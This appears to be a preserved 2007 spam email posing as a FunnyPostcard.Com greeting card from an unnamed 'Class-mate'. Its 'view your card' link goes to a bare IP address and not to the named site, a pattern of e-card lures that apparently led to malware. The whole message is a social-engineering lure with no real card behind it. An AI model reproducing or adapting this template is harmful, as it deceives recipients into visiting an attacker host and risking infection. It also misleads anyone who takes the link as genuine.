Subject: Class-mate sent you a greeting card from FunnyPostcard.Com!

From: "FunnyPostcard.Com" <[email-masked]>
Date: Fri, 10 Aug 2007 23:58:10 +1000

Class-mate has created a postcard for you at FunnyPostcard.Com,
the Internet's most popular greeting card service. 

Your greeting card ID is: 39da65121198c498bb5cc61301cba46921636c8 

To see your custom greeting card, simply click on the link below: 
http://68.118.72.4/?39da65121198c498bb5cc61301cba46921636c8

Send greeting cards from FunnyPostcard.Com whenever you want by visiting us at: 
http://FunnyPostcard.Com/
Copyright (c) 1996-2007 FunnyPostcard.Com All Rights Reserved